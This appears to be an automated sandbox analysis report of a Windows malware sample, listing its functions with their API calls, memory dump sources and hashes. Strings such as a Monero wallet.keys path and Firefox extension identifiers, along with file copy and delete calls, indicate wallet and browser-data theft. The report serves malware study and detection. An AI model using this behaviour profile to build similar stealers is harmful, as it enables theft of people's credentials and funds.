                            Function 00689260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                            Download Yara Rule
                            APIs
                            • StrStrA.SHLWAPI(012BEAD8,?,?,?,0068140C,?,012BEAD8,00000000), ref: 0068926C
                            • lstrcpyn.KERNEL32(008BAB88,012BEAD8,012BEAD8,?,0068140C,?,012BEAD8), ref: 00689290
                            • lstrlen.KERNEL32(?,?,0068140C,?,012BEAD8), ref: 006892A7
                            • wsprintfA.USER32 ref: 006892C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: b5c62715f6b4412c22e22bf8c6b85ff5694679e92dbf78f3594d188d030bf557
                            • Instruction ID: 3abe8178ccceebd0b58e7dcf2aba76b75f131f5d871f0b8f80afab8c7cd9d6fc
                            • Opcode Fuzzy Hash: b5c62715f6b4412c22e22bf8c6b85ff5694679e92dbf78f3594d188d030bf557
                            • Instruction Fuzzy Hash: 1F01CC75510108FFCB08DFECC998EAE7BB9FB44364F148248F9199B305C631AA40DB95
                            Function 006712A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006712B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006712BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006712D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006712F5
                            • RegCloseKey.ADVAPI32(?), ref: 006712FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 5206ba54ad68ac80852dba26b7a2d11b0aa7a673339c8ddbbc54d6e545c85d1f
                            • Instruction ID: 1befca25e84963ae6e6316221d9e710816f17c9f0002dba4f90e7eab4277040a
                            • Opcode Fuzzy Hash: 5206ba54ad68ac80852dba26b7a2d11b0aa7a673339c8ddbbc54d6e545c85d1f
                            • Instruction Fuzzy Hash: E90131B9A40208BBDB04DFE4DC49FAEB7BCFB48701F008259FA1597280DA71AA018F51
                            Function 00686630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00686663
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00686726
                            • ExitProcess.KERNEL32 ref: 00686755
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: bd76dfe025d2e0e1e72cfaf3ef431e1d360b81dc018a48d34e24c5b36c65a9be
                            • Instruction ID: 3c4a43b44e5078486e45a0459714c2c94061d431d80032ded876aa684efe4146
                            • Opcode Fuzzy Hash: bd76dfe025d2e0e1e72cfaf3ef431e1d360b81dc018a48d34e24c5b36c65a9be
                            • Instruction Fuzzy Hash: 7A312DB1801218AADB58FB90DC92BDD7779AF04300F804299F60566191DF746B49CF6A
                            Function 006887C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00690E28,00000000,?), ref: 0068882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00688836
                            • wsprintfA.USER32 ref: 00688850
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: d3a10e2f3f7e5d57dd2a3bd9ca43e8d32faccc099f9a96c4cd6d69dcf0d58a9f
                            • Instruction ID: 1224660548422c19cd520126e596e1b2d79859db81dff92b1b7abd48aae1153b
                            • Opcode Fuzzy Hash: d3a10e2f3f7e5d57dd2a3bd9ca43e8d32faccc099f9a96c4cd6d69dcf0d58a9f
                            • Instruction Fuzzy Hash: D02142B1A44208BFDB14DFD4DD45FAEBBB8FB48701F104219F605A7680C779A901CBA5
                            Function 00688D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0068951E,00000000), ref: 00688D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00688D62
                            • wsprintfW.USER32 ref: 00688D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 29503fefe7502d3a79c525fd10f92b956cc29187a94b8fe825285d35cf2b572e
                            • Instruction ID: 94162b8ad4b00a849057e9f37f69e6597c122a8534bb6c690d8d04eef21e73df
                            • Opcode Fuzzy Hash: 29503fefe7502d3a79c525fd10f92b956cc29187a94b8fe825285d35cf2b572e
                            • Instruction Fuzzy Hash: 07E08CB0A40208BFDB04DB94DD0EE6977BCFB04702F0002A4FD0987680EA71AE048B96
                            Function 0067A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 00688B60: GetSystemTime.KERNEL32(00690E1A,012BE078,006905AE,?,?,006713F9,?,0000001A,00690E1A,00000000,?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 00688B86
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0067A2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 0067A3FF
                            • lstrlen.KERNEL32(00000000), ref: 0067A6BC
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 0067A743
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 9dc21cb46820795012973694f34a1d12c579605cbbfb7e3f3101fd3b9504072d
                            • Instruction ID: 6b9657be1512116712e6fb1e23c675f5de72ccad7e0efbfa25bf27de808416ca
                            • Opcode Fuzzy Hash: 9dc21cb46820795012973694f34a1d12c579605cbbfb7e3f3101fd3b9504072d
                            • Instruction Fuzzy Hash: B4E1E6B28101149AEB58FBE4DC91DEE733EAF54300F50825EF91676091EF346A49CB76
                            Function 0067D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 00688B60: GetSystemTime.KERNEL32(00690E1A,012BE078,006905AE,?,?,006713F9,?,0000001A,00690E1A,00000000,?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 00688B86
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0067D481
                            • lstrlen.KERNEL32(00000000), ref: 0067D698
                            • lstrlen.KERNEL32(00000000), ref: 0067D6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 0067D72B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: e95c568b0f83d124678b570162d3fbe8a6f47d6b4fbc218c3fd37a839c7c081a
                            • Instruction ID: cab4bf52703ca543d44b7296b47da7337a07f0d086f371ff965d063c452972bf
                            • Opcode Fuzzy Hash: e95c568b0f83d124678b570162d3fbe8a6f47d6b4fbc218c3fd37a839c7c081a
                            • Instruction Fuzzy Hash: 5E91D1B19101049AEB48FBE4DD96DEE733AAF14300F50475EF91676091EF386A09CB7A
                            Function 0067D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 00688B60: GetSystemTime.KERNEL32(00690E1A,012BE078,006905AE,?,?,006713F9,?,0000001A,00690E1A,00000000,?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 00688B86
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0067D801
                            • lstrlen.KERNEL32(00000000), ref: 0067D99F
                            • lstrlen.KERNEL32(00000000), ref: 0067D9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 0067DA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: d39e01202751e9958faa1feef4a115cb30da8b4d511e245a780859ac64e78e26
                            • Instruction ID: 2fd5b5877471c1918a61435c0b614422e24fbae011abb293864606fc674522db
                            • Opcode Fuzzy Hash: d39e01202751e9958faa1feef4a115cb30da8b4d511e245a780859ac64e78e26
                            • Instruction Fuzzy Hash: 9981D3B19101049AEB48FBE4DC96DEE733ABF54300F50465EF91676091EF386A09CB76
                            Function 0067F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 006799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006799EC
                              • Part of subcall function 006799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00679A11
                              • Part of subcall function 006799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00679A31
                              • Part of subcall function 006799C0: ReadFile.KERNEL32(000000FF,?,00000000,0067148F,00000000), ref: 00679A5A
                              • Part of subcall function 006799C0: LocalFree.KERNEL32(0067148F), ref: 00679A90
                              • Part of subcall function 006799C0: CloseHandle.KERNEL32(000000FF), ref: 00679A9A
                              • Part of subcall function 00688E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00688E52
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00691580,00690D92), ref: 0067F54C
                            • lstrlen.KERNEL32(00000000), ref: 0067F56B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 352782974a6f84dcfad3e2e294d452e84eee225c7ec06c5296c7320cde686aaa
                            • Instruction ID: c0cb417bdfc3b2aafef19c43a6235726b3a9ef2872af8dbe7b9942b632f37245
                            • Opcode Fuzzy Hash: 352782974a6f84dcfad3e2e294d452e84eee225c7ec06c5296c7320cde686aaa
